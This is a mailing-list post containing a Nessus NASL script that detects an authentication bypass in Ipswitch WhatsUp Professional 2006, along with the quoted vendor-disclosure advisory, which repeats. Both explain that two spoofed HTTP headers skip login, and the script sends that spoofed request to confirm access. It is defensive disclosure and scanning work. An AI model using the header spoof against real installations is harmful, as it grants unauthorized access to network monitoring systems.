I should have detect this!
Find enclosed an nasl file to use with nessus scanner.
david
> What's Up Professional 2006 is vulnerable to a spoofing attack whereby
> the attacker can trick the application into thinking he/she is making a
> request from the console (which is considered trusted). This attack will
> allow the attacker to bypass the authentication mechanism of the
> application and login without credentials.
>
> The application believes that if it is passed the following headers in
> an HTTP request, then it is a trusted request:
> User-Agent: Ipswitch/1.0
> User-Application: NmConsole
>
> These headers can be easily spoofed. An easy way to accomplish the spoof
> is to use a webproxy such as webscarab (see owasp.org).
>
> I have put a more detailed text file here:
> http://www.ftusecurity.com/pub/whatsup.public.pdf
>
> I contacted IPSwitch. They said the issue would be fixed in the next
> release. I followed up twice to find a status and did not receive a reply.
>
> Since the release of some What's Up Professional vulnerabilities
> recently -- see: http://www.securityfocus.com/archive/1/433808 -- I
> decided to release this information. I've been burned in the past by
> reporting vulnerabilities responsibly to vendors, someone else
> irresponsibly discloses the issue publicly before the fix is released
> and the company does not credit me with the initial report.
>
> Sincerely,
> Kenneth F. Belva, CISSP
> http://www.ftusecurity.com
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
#
# This script was written by David Maciejak <david dot maciejak at kyxar dot fr>
# This script is released under the GNU GPL v2
#
res = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
if( res == NULL )exit(0);
if ("<title>Group Device List for My Network - Ipswitch WhatsUp Professional" >< res)
{
security_note(port);
}
}
}
Find enclosed an nasl file to use with nessus scanner.
david
> What's Up Professional 2006 is vulnerable to a spoofing attack whereby
> the attacker can trick the application into thinking he/she is making a
> request from the console (which is considered trusted). This attack will
> allow the attacker to bypass the authentication mechanism of the
> application and login without credentials.
>
> The application believes that if it is passed the following headers in
> an HTTP request, then it is a trusted request:
> User-Agent: Ipswitch/1.0
> User-Application: NmConsole
>
> These headers can be easily spoofed. An easy way to accomplish the spoof
> is to use a webproxy such as webscarab (see owasp.org).
>
> I have put a more detailed text file here:
> http://www.ftusecurity.com/pub/whatsup.public.pdf
>
> I contacted IPSwitch. They said the issue would be fixed in the next
> release. I followed up twice to find a status and did not receive a reply.
>
> Since the release of some What's Up Professional vulnerabilities
> recently -- see: http://www.securityfocus.com/archive/1/433808 -- I
> decided to release this information. I've been burned in the past by
> reporting vulnerabilities responsibly to vendors, someone else
> irresponsibly discloses the issue publicly before the fix is released
> and the company does not credit me with the initial report.
>
> Sincerely,
> Kenneth F. Belva, CISSP
> http://www.ftusecurity.com
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
#
# This script was written by David Maciejak <david dot maciejak at kyxar dot fr>
# This script is released under the GNU GPL v2
#
if(description)
{
script_id(20000);
script_version("$Revision: 1.0 $");
# script_bugtraq_id();
name["english"] = "Ipswitch WhatsUp Professional Authentication bypass detection";
script_name(english:name["english"]);
desc["english"] = "
Synopsis:
The remote host appears to be running Ipswitch WhatsUp Professional.
Description:
This product is used to monitor states of applications, services and hosts.
This version is prone to authentication bypass flaw, a malicious user can
access your software without having valid credential.
See also:
http://www.ipswitch.com/products/whatsup/professional/
Risk factor :
Low / CVSS Base Score: ?????";
script_description(english:desc["english"]);
summary["english"] = "Checks for Ipswitch WhatsUp Professional Authentication Bypass";
script_summary(english:summary["english"]);
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2006 David Maciejak");
family["english"] = "Misc.";
family["francais"] = "Divers";
script_family(english:family["english"], francais:family["francais"]);
script_dependencie("http_version.nasl");
script_require_ports("Services/www", 80, 8022);
exit(0);
}
#code
include("http_func.inc");
include("http_keepalive.inc");
ports = get_kb_list ("Services/www");
if (isnull(ports))
ports = make_list (80,8022);
else
ports = make_list (8022, ports);
foreach port (ports)
{
if(get_port_state(port))
{
req = string(
"GET ", "/NmConsole/Navigation.asp", " HTTP/1.1\r\n",
"Host: ", get_host_name(), "\r\n",
"User-Agent: Ipswitch/1.0", "\r\n",
"User-Application: NmConsole", "\r\n",
"Accept: text/xml,application/xml,application/xhtml+xml,text/html,q=0.9,text/plai
n;q=0.8,image/png,*/*;q=0.5","\r\n",
"Accept-Language: en-us,en;q=0.5","\r\n",
"Accept-Encoding: gzip,deflate","\r\n",
"Keep-Alive: 300","\r\n",
"Proxy-Connection: keep-alive","\r\n",
"Referer: ",get_host_name(),"\r\n","\r\n"
);
res = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
if( res == NULL )exit(0);
if ("<title>Group Device List for My Network - Ipswitch WhatsUp Professional" >< res)
{
security_note(port);
}
}
}
[ reply ]